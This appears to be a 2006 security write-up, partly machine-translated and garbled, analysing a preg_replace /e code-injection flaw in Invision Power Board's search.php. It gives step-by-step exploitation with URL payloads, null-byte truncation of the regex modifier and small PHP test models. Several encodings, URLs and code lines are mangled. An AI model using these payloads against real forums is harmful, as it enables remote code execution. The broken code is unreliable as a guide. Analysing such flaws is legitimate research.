ipb search.php vulnerability analysis and thinking
#################################################
A vulnerability model may unearth a batch of vulnerabilities
Idea is the most important preg_replace+/e
#################################################
Author: SuperHei_[At]_ph4nt0m.org
Blog: http://superhei.blogbus.com/
Team: http://www.ph4nt0m.org
Data: 2006-04-27
#############
##Simple analysis###
#############
The vulnerability is another one of preg_replace+/e vulnerability,代码 在 \sources\action_admin\search.php line 1 2 5 8-1 2 6 a 2:
if ( $this->ipsclass->input[‘lastdate’] )
{
$this->output = preg_replace( “#(value=["‘]{$this->ipsclass->input[‘lastdate’]}["’])#i”, "\\1
selected=‘selected’", $this->output );
}
}
By the variable input[‘lastdate’]injected/e, $this->output the injected shellcode is.
#############
##Use method###
#############
To register a user, send a patch[shellcode]as follows: [
superheixxxxxxxeval(phpinf0()); //
Note that the last of the;and//between a space
Then click the"Search"—>Search by Keywords: superheixxxxxxxeval [remember to choose Show results as posts ]
You can get searchid
http://127.0.0.1/ipb215/upload/inde…_in=posts&resul
t_type=posts&highlite=superheixxxxxxxeval
Then later added a& lastdate=z|eval.*?% 2 0//)%23e%0 0 that is, [/e]submit ok:
http://127.0.0.1/ipb215/upload/inde…_in=posts&resul
t_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?% 2 0//)%23e%0 0
#############
##Analysis of discussion###
#############
if ( $this->ipsclass->input[‘lastdate’] )
{
$this->output = preg_replace( “#(value=["‘]{$this->ipsclass->input[‘lastdate’]}["’])#i”, "\\1
selected=‘selected’", $this->output );
}
}
By the variable input[‘lastdate’]injected/e, $this->output the injected shellcode is.
This analysis, out an important detail: preg_replace+/e there are 3 parameters, only the first 2 parameters in the code can only be executed, but the above statement seems to be the 3 parameters submitted
The,in fact, note that the above preg_replace in the first 2 parameters:\\1 selected=‘selected’ inside\\1 is the first parameter in the regular expression try matching the value. In the final analysis
We submitted the shellcode is still on the first 2 parameters to perform.
This again is why? Because we submitted lastdate=z|eval.*?% 2 0//)%23e%0 0. is space+//for the flag, so we submitted the shellcode must also have a space+//
I think this should be regarded as php itself one of the vulnerabilities[before the include of null truncation vulnerability], we test the above vulnerability and write a simple model:
<?
$a=$_GET[a];
echo preg_replace(“#(value=["‘]z|eval.*?//)# e{$a}["’])#i”,"\\1 ",“heigegegxxxxxxxeval(phpinfo());//”);
?& gt;
We directly submitted http://127.0.0.1/test2. php? a=2 error:
Warning: Unknown modifier ‘2’ in d:\easyphp\www\test2.php on line 3
Submitted http://127.0.0.1/test2. php? a=%0 0 2 then execute phpinfo(). We successfully truncated. Model code-execution environment that requires gpc=off, but in many of the web application is
After a variable encoding and decoding in the implementation, so is not affected by gpc of the impact of the above ipb can at gpc=on the case of truncation.
4."lastdate=z|eval.*?% 2 0//)%23e%0 0"construction
Mainly in this->output in the eval and%2 0//to flag to take the\\1 for the execution of the php code.
Authentication", but it is said that this can write a program to read out the?? As long as the breakthrough this worm is possible, after all ipb users have so much…
#############
##Summary of the model###
#############
Directly in the preg_replace the first 2 variables execution mode:
<?
echo preg_replace(“/test/e”,$h,“jutst test”);
?& gt;
Submitted http://127.0.0.1/test/1 1/preg. php? h=phpinfo()
Examples such as: phpbb viewtopic. php variable$highliht_match submit php code execution vulnerability
By\\1[or\\n]extracts the first 3 variables in the php code and execution mode:
<?
echo preg_replace(“/\s*\php\\ [/php\]\s*/ies”, “\\1”, $h);
?& gt;
Submitted to: http://127.0.0.1/test/11/preg.php?h=Codz:
phpinfo()
Reference:
r57 exp: the http://www.milw0rm.com/exploits/1720
More information: http://www.google.com